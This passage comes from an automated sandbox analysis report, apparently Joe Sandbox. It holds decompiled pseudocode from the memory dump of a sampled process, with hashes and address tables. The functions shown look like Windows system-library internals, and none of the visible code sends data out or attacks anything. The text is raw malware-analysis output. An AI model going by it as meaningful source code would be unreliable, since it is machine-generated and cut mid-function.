                                  												while(1) {
                                  													L19:
                                  													__eflags = _t95;
                                  													if(_t95 == 0) {
                                  														break;
                                  													}
                                  													_t102 = _t80;
                                  													 *(_t104 - 0x30) = _t95;
                                  													 *(_t104 - 0x24) = _t95 - 1;
                                  													asm("lock cmpxchg8b [edi]");
                                  													_t80 = _t102;
                                  													 *(_t104 - 0x28) = _t80;
                                  													 *(_t104 - 0x24) = _t95;
                                  													__eflags = _t80 - _t102;
                                  													_t99 =  *(_t104 + 8);
                                  													if(_t80 != _t102) {
                                  														continue;
                                  													} else {
                                  														__eflags = _t95 -  *(_t104 - 0x30);
                                  														if(_t95 !=  *(_t104 - 0x30)) {
                                  															continue;
                                  														} else {
                                  															__eflags = _t95;
                                  															if(_t95 != 0) {
                                  																_t74 = 0;
                                  																 *(_t104 - 0x34) = 0;
                                  																_t102 = 0;
                                  																__eflags = 0;
                                  																while(1) {
                                  																	 *(_t104 - 0x3c) = _t102;
                                  																	__eflags = _t102 - 3;
                                  																	if(_t102 >= 3) {
                                  																		break;
                                  																	}
                                  																	__eflags = _t74;
                                  																	if(_t74 != 0) {
                                  																		L49:
                                  																		_t102 =  *_t74;
                                  																		__eflags = _t102;
                                  																		if(_t102 != 0) {
                                  																			_t102 =  *(_t102 + 4);
                                  																			__eflags = _t102;
                                  																			if(_t102 != 0) {
                                  																				 *0x351b1e0(_t74, _t99);
                                  																				 *_t102();
                                  																			}
                                  																		}
                                  																		do {
                                  																			_t71 = _t99 + 8;
                                  																			 *(_t104 - 0x2c) = _t71;
                                  																			_t80 =  *_t71;
                                  																			_t95 = _t71[1];
                                  																			 *(_t104 - 0x28) = _t80;
                                  																			 *(_t104 - 0x24) = _t95;
                                  																			goto L19;
                                  																		} while (_t74 == 0);
                                  																		goto L49;
                                  																	} else {
                                  																		_t82 = 0;
                                  																		__eflags = 0;
                                  																		while(1) {
                                  																			 *(_t104 - 0x38) = _t82;
                                  																			__eflags = _t82 -  *0x35184c0;
                                  																			if(_t82 >=  *0x35184c0) {
                                  																				break;
                                  																			}
                                  																			__eflags = _t74;
                                  																			if(_t74 == 0) {
                                  																				_t77 = E034F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                  																				__eflags = _t77;
                                  																				if(_t77 == 0) {
                                  																					_t74 = 0;
                                  																					__eflags = 0;
                                  																				} else {
                                  																					_t74 = _t77 + 0xfffffff4;
                                  																				}
                                  																				 *(_t104 - 0x34) = _t74;
                                  																				_t82 = _t82 + 1;
                                  																				continue;
                                  																			}
                                  																			break;
                                  																		}
                                  																		_t102 = _t102 + 1;
                                  																		continue;
                                  																	}
                                  																	goto L20;
                                  																}
                                  																__eflags = _t74;
                                  															}
                                  														}
                                  													}
                                  													break;
                                  												}
                                  												L20:
                                  												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                  												 *((char*)(_t99 + 0xe5)) = 1;
                                  												 *((char*)(_t104 - 0x1d)) = 1;
                                  												goto L21;
                                  											}
                                  										}
                                  										L21:
                                  										 *(_t104 - 4) = 0xfffffffe;
                                  										E0342922A(_t99);
                                  										_t64 = E03447D50();
                                  										__eflags = _t64;
                                  										if(_t64 != 0) {
                                  											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  										} else {
                                  											_t67 = 0x7ffe0386;
                                  										}
                                  										__eflags =  *_t67;
                                  										if( *_t67 != 0) {
                                  											_t67 = E034F8B58(_t99);
                                  										}
                                  										__eflags =  *((char*)(_t104 - 0x1d));
                                  										if( *((char*)(_t104 - 0x1d)) != 0) {
                                  											__eflags = _t99 -  *0x35186c0; // 0xca07b0
                                  											if(__eflags != 0) {
                                  												__eflags = _t99 -  *0x35186b8; // 0x0
                                  												if(__eflags == 0) {
                                  													_t94 = 0x35186bc;
                                  													_t87 = 0x35186b8;
                                  													goto L27;
                                  												} else {
                                  													__eflags = _t67 | 0xffffffff;
                                  													asm("lock xadd [edi], eax");
                                  													if(__eflags == 0) {
                                  														E03429240(_t80, _t99, _t99, _t102, __eflags);
                                  													}
                                  												}
                                  											} else {
                                  												_t94 = 0x35186c4;
                                  												_t87 = 0x35186c0;
                                  												L27:
                                  												E03459B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                  											}
                                  										}
                                  									} else {
                                  										goto L13;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						return E0347D130(_t80, _t99, _t102);
                                  					} else {
                                  						 *_t51 = 0x3515388;
                                  						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                  						 *_t84 = _t51;
                                  						 *0x351538c = _t51;
                                  						goto L6;
                                  					}
                                  				}
                                  			}




















                                  0x03429082
                                  0x03429083
                                  0x03429084
                                  0x03429085
                                  0x03429087
                                  0x03429096
                                  0x03429098
                                  0x03429098
                                  0x0342909e
                                  0x034290a8
                                  0x034290e7
                                  0x034290e7
                                  0x034290aa
                                  0x034290b0
                                  0x034290b7
                                  0x034290bd
                                  0x034290dd
                                  0x034290e6
                                  0x034290bf
                                  0x034290bf
                                  0x034290c7
                                  0x034290cf
                                  0x034290f1
                                  0x034290f2
                                  0x034290f4
                                  0x034290f5
                                  0x034290f6
                                  0x034290f7
                                  0x034290f8
                                  0x034290f9
                                  0x034290fa
                                  0x034290fb
                                  0x034290fc
                                  0x034290fd
                                  0x034290fe
                                  0x034290ff
                                  0x03429100
                                  0x03429102
                                  0x03429107
                                  0x0342910c
                                  0x03429110
                                  0x03429113
                                  0x03429115
                                  0x03429136
                                  0x0342913f
                                  0x03429143
                                  0x034837e4
                                  0x034837e4
                                  0x03429117
                                  0x03429117
                                  0x0342911d
                                  0x00000000
                                  0x0342911f
                                  0x0342911f
                                  0x03429125
                                  0x00000000
                                  0x03429127
                                  0x0342912d
                                  0x03429130
                                  0x03429134
                                  0x03429158
                                  0x0342915d
                                  0x03429161
                                  0x03429168
                                  0x03483715
                                  0x0342916e
                                  0x0342916e
                                  0x03429175
                                  0x03429177
                                  0x0342917e
                                  0x0342917f
                                  0x03429182
                                  0x03429182
                                  0x03429187
                                  0x03429187
                                  0x0342918a
                                  0x0342918d
                                  0x0342918f
                                  0x03429192
                                  0x03429195
                                  0x03429198
                                  0x03429198
                                  0x03429198
                                  0x0342919a
                                  0x00000000
                                  0x00000000
                                  0x0348371f
                                  0x03483721
                                  0x03483727
                                  0x0348372f
                                  0x03483733
                                  0x03483735
                                  0x03483738
                                  0x0348373b
                                  0x0348373d
                                  0x03483740
                                  0x00000000
                                  0x03483746
                                  0x03483746
                                  0x03483749
                                  0x00000000
                                  0x0348374f
                                  0x0348374f
                                  0x03483751
                                  0x03483757
                                  0x03483759
                                  0x0348375c
                                  0x0348375c
                                  0x0348375e
                                  0x0348375e
                                  0x03483761
                                  0x03483764
                                  0x00000000
                                  0x00000000
                                  0x03483766
                                  0x03483768
                                  0x034837a3
                                  0x034837a3
                                  0x034837a5
                                  0x034837a7
                                  0x034837ad
                                  0x034837b0
                                  0x034837b2
                                  0x034837bc
                                  0x034837c2
                                  0x034837c2
                                  0x034837b2
                                  0x03429187
                                  0x03429187
                                  0x0342918a
                                  0x0342918d
                                  0x0342918f
                                  0x03429192
                                  0x03429195
                                  0x00000000
                                  0x03429195
                                  0x00000000
                                  0x0348376a
                                  0x0348376a
                                  0x0348376a
                                  0x0348376c
                                  0x0348376c
                                  0x0348376f
                                  0x03483775
                                  0x00000000
                                  0x00000000
                                  0x03483777
                                  0x03483779
                                  0x03483782
                                  0x03483787
                                  0x03483789
                                  0x03483790
                                  0x03483790
                                  0x0348378b
                                  0x0348378b
                                  0x0348378b
                                  0x03483792
                                  0x03483795
                                  0x00000000
                                  0x03483795
                                  0x00000000
                                  0x03483779
                                  0x03483798
                                  0x00000000
                                  0x03483798
                                  0x00000000
                                  0x03483768
                                  0x0348379b
                                  0x0348379b
                                  0x03483751
                                  0x03483749
                                  0x00000000
                                  0x03483740
                                  0x034291a0
                                  0x034291a3
                                  0x034291a9
                                  0x034291b0
                                  0x00000000
                                  0x034291b0
                                  0x03429187
                                  0x034291b4
                                  0x034291b4
                                  0x034291bb
                                  0x034291c0
                                  0x034291c5
                                  0x034291c7
                                  0x034837da
                                  0x034291cd
                                  0x034291cd
                                  0x034291cd
                                  0x034291d2
                                  0x034291d5
                                  0x03429239
                                  0x03429239
                                  0x034291d7
                                  0x034291db
                                  0x034291e1
                                  0x034291e7
                                  0x034291fd
                                  0x03429203
                                  0x0342921e
                                  0x03429223
                                  0x00000000
                                  0x03429205
                                  0x03429205
                                  0x03429208
                                  0x0342920c
                                  0x03429214
                                  0x03429214
                                  0x0342920c
                                  0x034291e9
                                  0x034291e9
                                  0x034291ee
                                  0x034291f3
                                  0x034291f3
                                  0x034291f3
                                  0x034291e7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03429134
                                  0x03429125
                                  0x0342911d
                                  0x0342914e
                                  0x034290d1
                                  0x034290d1
                                  0x034290d3
                                  0x034290d6
                                  0x034290d8
                                  0x00000000
                                  0x034290d8
                                  0x034290cf

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20a03722d8f774303a5e6c9e0b966143acf5be5a675123548b4ca6a41a3eccf8
                                  • Instruction ID: f3ef63344f004afa5eefae4d851b5f9b1056760592e57d09fbe5cccd8b6ea0f4
                                  • Opcode Fuzzy Hash: 20a03722d8f774303a5e6c9e0b966143acf5be5a675123548b4ca6a41a3eccf8
                                  • Instruction Fuzzy Hash: 3901D1726016188FD324DF05D840B12BBE9EB86320F29456BE601DF7A1D370DC51CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E034BC450(intOrPtr* _a4) {
                                  				signed char _t25;
                                  				intOrPtr* _t26;
                                  				intOrPtr* _t27;
                                  
                                  				_t26 = _a4;
                                  				_t25 =  *(_t26 + 0x10);
                                  				if((_t25 & 0x00000003) != 1) {
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push( *((intOrPtr*)(_t26 + 8)));
                                  					_push(0);
                                  					_push( *_t26);
                                  					E03469910();
                                  					_t25 =  *(_t26 + 0x10);
                                  				}
                                  				if((_t25 & 0x00000001) != 0) {
                                  					_push(4);
                                  					_t7 = _t26 + 4; // 0x4
                                  					_t27 = _t7;
                                  					_push(_t27);
                                  					_push(5);
                                  					_push(0xfffffffe);
                                  					E034695B0();
                                  					if( *_t27 != 0) {
                                  						_push( *_t27);
                                  						E034695D0();
                                  					}
                                  				}
                                  				_t8 = _t26 + 0x14; // 0x14
                                  				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                  				}
                                  				_push( *_t26);
                                  				E034695D0();
                                  				return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                  			}






                                  0x034bc458
                                  0x034bc45d
                                  0x034bc466
                                  0x034bc468
                                  0x034bc469
                                  0x034bc46a
                                  0x034bc46b
                                  0x034bc46e
                                  0x034bc46f
                                  0x034bc471
                                  0x034bc476
                                  0x034bc476
                                  0x034bc47c
                                  0x034bc47e
                                  0x034bc480
                                  0x034bc480
                                  0x034bc483
                                  0x034bc484
                                  0x034bc486
                                  0x034bc488
                                  0x034bc48f
                                  0x034bc491
                                  0x034bc493
                                  0x034bc493
                                  0x034bc48f
                                  0x034bc498
                                  0x034bc49e
                                  0x034bc4ad
                                  0x034bc4ad
                                  0x034bc4b2
                                  0x034bc4b4
                                  0x034bc4cd

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                  • Instruction ID: 52d601d1756ed1a5aa4e5adcc0b3ac69b7f717ed53741a2bd0a46502af3f21fd
                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                  • Instruction Fuzzy Hash: C4016D76140605BFE621EF66CDD0EA2FB7DFB54390B04452BF2144A660CB71ACA1CAB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E034F4015(signed int __eax, signed int __ecx) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed char _t10;
                                  				signed int _t28;
                                  
                                  				_push(__ecx);
                                  				_t28 = __ecx;
                                  				asm("lock xadd [edi+0x24], eax");
                                  				_t10 = (__eax | 0xffffffff) - 1;
                                  				if(_t10 == 0) {
                                  					_t1 = _t28 + 0x1c; // 0x1e
                                  					E03442280(_t10, _t1);
                                  					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                  					E03442280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x35186ac);
                                  					E0342F900(0x35186d4, _t28);
                                  					E0343FFB0(0x35186ac, _t28, 0x35186ac);
                                  					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                  					E0343FFB0(0, _t28, _t1);
                                  					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                  					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                  					}
                                  					_t10 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                  				}
                                  				return _t10;
                                  			}







                                  0x034f401a
                                  0x034f401e
                                  0x034f4023
                                  0x034f4028
                                  0x034f4029
                                  0x034f402b
                                  0x034f402f
                                  0x034f4043
                                  0x034f4046
                                  0x034f4051
                                  0x034f4057
                                  0x034f405f
                                  0x034f4062
                                  0x034f4067
                                  0x034f406f
                                  0x034f407c
                                  0x034f407c
                                  0x034f408c
                                  0x034f408c
                                  0x034f4097

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12cb08fa84bba951773d2179f7a8aab6266a74cdc2374cd09876892f57450924
                                  • Instruction ID: f3ef44f939f0b3e0dbc102b36e76b12ef8657a5d3fd5759892f6ce782511c829
                                  • Opcode Fuzzy Hash: 12cb08fa84bba951773d2179f7a8aab6266a74cdc2374cd09876892f57450924
                                  • Instruction Fuzzy Hash: 6A018475601A497FD211EB6ACD80E17B7ACFB49660B04062BF6088FA21CB24EC11C6E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E034E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				short _v54;
                                  				char _v60;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed char* _t21;
                                  				intOrPtr _t27;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				signed int _t35;
                                  
                                  				_t32 = __edx;
                                  				_t27 = __ebx;
                                  				_v8 =  *0x351d360 ^ _t35;
                                  				_t33 = __edx;
                                  				_t34 = __ecx;
                                  				E0346FA60( &_v60, 0, 0x30);
                                  				_v20 = _a4;
                                  				_v16 = _a8;
                                  				_v28 = _t34;
                                  				_v24 = _t33;
                                  				_v54 = 0x1033;
                                  				if(E03447D50() == 0) {
                                  					_t21 = 0x7ffe0388;
                                  				} else {
                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  				}
                                  				_push( &_v60);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t21 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                  			}

















                                  0x034e138a
                                  0x034e138a
                                  0x034e1399
                                  0x034e13a3
                                  0x034e13a8
                                  0x034e13aa
                                  0x034e13b5
                                  0x034e13bb
                                  0x034e13c3
                                  0x034e13c6
                                  0x034e13c9
                                  0x034e13d4
                                  0x034e13e6
                                  0x034e13d6
                                  0x034e13df
                                  0x034e13df
                                  0x034e13f1
                                  0x034e13f2
                                  0x034e13f4
                                  0x034e13f9
                                  0x034e140e

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb79a75206d213332778fd76115dbc699cacbce05d502e0ebfaa2a2149fbfe23
                                  • Instruction ID: 5a2c4e9437d7ffcec84be53ed84d6cbba7c02eabc143469af62cf27289d14529
                                  • Opcode Fuzzy Hash: bb79a75206d213332778fd76115dbc699cacbce05d502e0ebfaa2a2149fbfe23
                                  • Instruction Fuzzy Hash: E0015275A00358AFDB14DFA9D881EAEBBB8EF44710F00406BB914EF380DA749A05C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E034E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				short _v54;
                                  				char _v60;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed char* _t21;
                                  				intOrPtr _t27;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				signed int _t35;
                                  
                                  				_t32 = __edx;
                                  				_t27 = __ebx;
                                  				_v8 =  *0x351d360 ^ _t35;
                                  				_t33 = __edx;
                                  				_t34 = __ecx;
                                  				E0346FA60( &_v60, 0, 0x30);
                                  				_v20 = _a4;
                                  				_v16 = _a8;
                                  				_v28 = _t34;
                                  				_v24 = _t33;
                                  				_v54 = 0x1034;
                                  				if(E03447D50() == 0) {
                                  					_t21 = 0x7ffe0388;
                                  				} else {
                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  				}
                                  				_push( &_v60);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t21 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                  			}

















                                  0x034e14fb
                                  0x034e14fb
                                  0x034e150a
                                  0x034e1514
                                  0x034e1519
                                  0x034e151b
                                  0x034e1526
                                  0x034e152c
                                  0x034e1534
                                  0x034e1537
                                  0x034e153a
                                  0x034e1545
                                  0x034e1557
                                  0x034e1547
                                  0x034e1550
                                  0x034e1550
                                  0x034e1562
                                  0x034e1563
                                  0x034e1565
                                  0x034e156a
                                  0x034e157f

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f94431d575641928412c04c82c9e2dca3b2abd3bbd046730dad44b6c4bbe6bc4
                                  • Instruction ID: 22861f78b2c7e496148a66a21f509d12eefd6b52ec0be44e55ae2ded589f2192
                                  • Opcode Fuzzy Hash: f94431d575641928412c04c82c9e2dca3b2abd3bbd046730dad44b6c4bbe6bc4
                                  • Instruction Fuzzy Hash: FA018075A00358AFCB00DF69D841EAEBBB8EF44700F40406BB915EF380DA70DA01CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E034258EC(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				char _v28;
                                  				char _v44;
                                  				char _v76;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t10;
                                  				intOrPtr _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t27;
                                  				intOrPtr _t28;
                                  				signed int _t29;
                                  
                                  				_v8 =  *0x351d360 ^ _t29;
                                  				_t10 =  *[fs:0x30];
                                  				_t27 = __ecx;
                                  				if(_t10 == 0) {
                                  					L6:
                                  					_t28 = 0x3405c80;
                                  				} else {
                                  					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                  					if(_t16 == 0) {
                                  						goto L6;
                                  					} else {
                                  						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                  					}
                                  				}
                                  				if(E03425943() != 0 &&  *0x3515320 > 5) {
                                  					E034A7B5E( &_v44, _t27);
                                  					_t22 =  &_v28;
                                  					E034A7B5E( &_v28, _t28);
                                  					_t11 = E034A7B9C(0x3515320, 0x340bf15,  &_v28, _t22, 4,  &_v76);
                                  				}
                                  				return E0346B640(_t11, _t17, _v8 ^ _t29, 0x340bf15, _t27, _t28);
                                  			}















                                  0x034258fb
                                  0x034258fe
                                  0x03425906
                                  0x0342590a
                                  0x0342593c
                                  0x0342593c
                                  0x0342590c
                                  0x0342590c
                                  0x03425911
                                  0x00000000
                                  0x03425913
                                  0x03425913
                                  0x03425913
                                  0x03425911
                                  0x0342591d
                                  0x03481035
                                  0x0348103c
                                  0x0348103f
                                  0x03481056
                                  0x03481056
                                  0x0342593b

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84504c41061b7e1764a557f4a79159e28a809cc13c2bec895a1cb396012c3080
                                  • Instruction ID: 20b589927738301be7e6bf5bc3648555bb5255e36dbcc351d55257222afd09e4
                                  • Opcode Fuzzy Hash: 84504c41061b7e1764a557f4a79159e28a809cc13c2bec895a1cb396012c3080
                                  • Instruction Fuzzy Hash: 89018475B006189FC714EF6BDC009AFFBE9EB86120B9840AB9805EF254DF30DD06CA59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                  				char _v8;
                                  				void* _v11;
                                  				unsigned int _v12;
                                  				void* _v15;
                                  				void* __esi;
                                  				void* __ebp;
                                  				char* _t16;
                                  				signed int* _t35;
                                  
                                  				_t22 = __ebx;
                                  				_t35 = __ecx;
                                  				_v8 = __edx;
                                  				_t13 =  !( *__ecx) + 1;
                                  				_v12 =  !( *__ecx) + 1;
                                  				if(_a4 != 0) {
                                  					E034F165E(__ebx, 0x3518ae4, (__edx -  *0x3518b04 >> 0x14) + (__edx -  *0x3518b04 >> 0x14), __edi, __ecx, (__edx -  *0x3518b04 >> 0x14) + (__edx -  *0x3518b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                  				}
                                  				E034EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                  				if(E03447D50() == 0) {
                                  					_t16 = 0x7ffe0388;
                                  				} else {
                                  					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  				}
                                  				if( *_t16 != 0) {
                                  					_t16 = E034DFE3F(_t22, _t35, _v8, _v12);
                                  				}
                                  				return _t16;
                                  			}











                                  0x034f1074
                                  0x034f1080
                                  0x034f1082
                                  0x034f108a
                                  0x034f108f
                                  0x034f1093
                                  0x034f10ab
                                  0x034f10ab
                                  0x034f10c3
                                  0x034f10cf
                                  0x034f10e1
                                  0x034f10d1
                                  0x034f10da
                                  0x034f10da
                                  0x034f10e9
                                  0x034f10f5
                                  0x034f10f5
                                  0x034f10fe

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1834a0bc0c81077f1c3d85267127d1f6d820437e5d9679aa834a5363cb5c9dce
                                  • Instruction ID: e87532b596c40a17bc537e72d9072547a7fbb869cdcab2372b153421dfbbdcf5
                                  • Opcode Fuzzy Hash: 1834a0bc0c81077f1c3d85267127d1f6d820437e5d9679aa834a5363cb5c9dce
                                  • Instruction Fuzzy Hash: 35014C76504741DFC710EF2AC940B1BB7E5AB84310F08C52AF9968B790DE30D445CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0343B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                  				signed char _t11;
                                  				signed char* _t12;
                                  				intOrPtr _t24;
                                  				signed short* _t25;
                                  
                                  				_t25 = __edx;
                                  				_t24 = __ecx;
                                  				_t11 = ( *[fs:0x30])[0x50];
                                  				if(_t11 != 0) {
                                  					if( *_t11 == 0) {
                                  						goto L1;
                                  					}
                                  					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                  					L2:
                                  					if( *_t12 != 0) {
                                  						_t12 =  *[fs:0x30];
                                  						if((_t12[0x240] & 0x00000004) == 0) {
                                  							goto L3;
                                  						}
                                  						if(E03447D50() == 0) {
                                  							_t12 = 0x7ffe0385;
                                  						} else {
                                  							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                  						}
                                  						if(( *_t12 & 0x00000020) == 0) {
                                  							goto L3;
                                  						}
                                  						return E034A7016(_a4, _t24, 0, 0, _t25, 0);
                                  					}
                                  					L3:
                                  					return _t12;
                                  				}
                                  				L1:
                                  				_t12 = 0x7ffe0384;
                                  				goto L2;
                                  			}







                                  0x0343b037
                                  0x0343b039
                                  0x0343b03b
                                  0x0343b040
                                  0x0348a60e
                                  0x00000000
                                  0x00000000
                                  0x0348a61d
                                  0x0343b04b
                                  0x0343b04e
                                  0x0348a627
                                  0x0348a634
                                  0x00000000
                                  0x00000000
                                  0x0348a641
                                  0x0348a653
                                  0x0348a643
                                  0x0348a64c
                                  0x0348a64c
                                  0x0348a65b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0348a66c
                                  0x0343b057
                                  0x0343b057
                                  0x0343b057
                                  0x0343b046
                                  0x0343b046
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                  • Instruction ID: fdb948cb921badb912c6f1ec411321239ef89123732bad455512f1fb490d4d91
                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                  • Instruction Fuzzy Hash: 6A017171209A809FD322DB5DC944FAB77ECEB46650F0D40A3E925CF761D668DC41CA28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E034DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				signed int _v12;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				short _v58;
                                  				char _v64;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed char* _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				signed int _t32;
                                  
                                  				_t29 = __edx;
                                  				_t24 = __ebx;
                                  				_v12 =  *0x351d360 ^ _t32;
                                  				_t30 = __edx;
                                  				_t31 = __ecx;
                                  				E0346FA60( &_v64, 0, 0x30);
                                  				_v24 = _a4;
                                  				_v32 = _t31;
                                  				_v28 = _t30;
                                  				_v58 = 0x267;
                                  				if(E03447D50() == 0) {
                                  					_t18 = 0x7ffe0388;
                                  				} else {
                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  				}
                                  				_push( &_v64);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t18 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                  			}
















                                  0x034dfe3f
                                  0x034dfe3f
                                  0x034dfe4e
                                  0x034dfe58
                                  0x034dfe5d
                                  0x034dfe5f
                                  0x034dfe6a
                                  0x034dfe72
                                  0x034dfe75
                                  0x034dfe78
                                  0x034dfe83
                                  0x034dfe95
                                  0x034dfe85
                                  0x034dfe8e
                                  0x034dfe8e
                                  0x034dfea0
                                  0x034dfea1
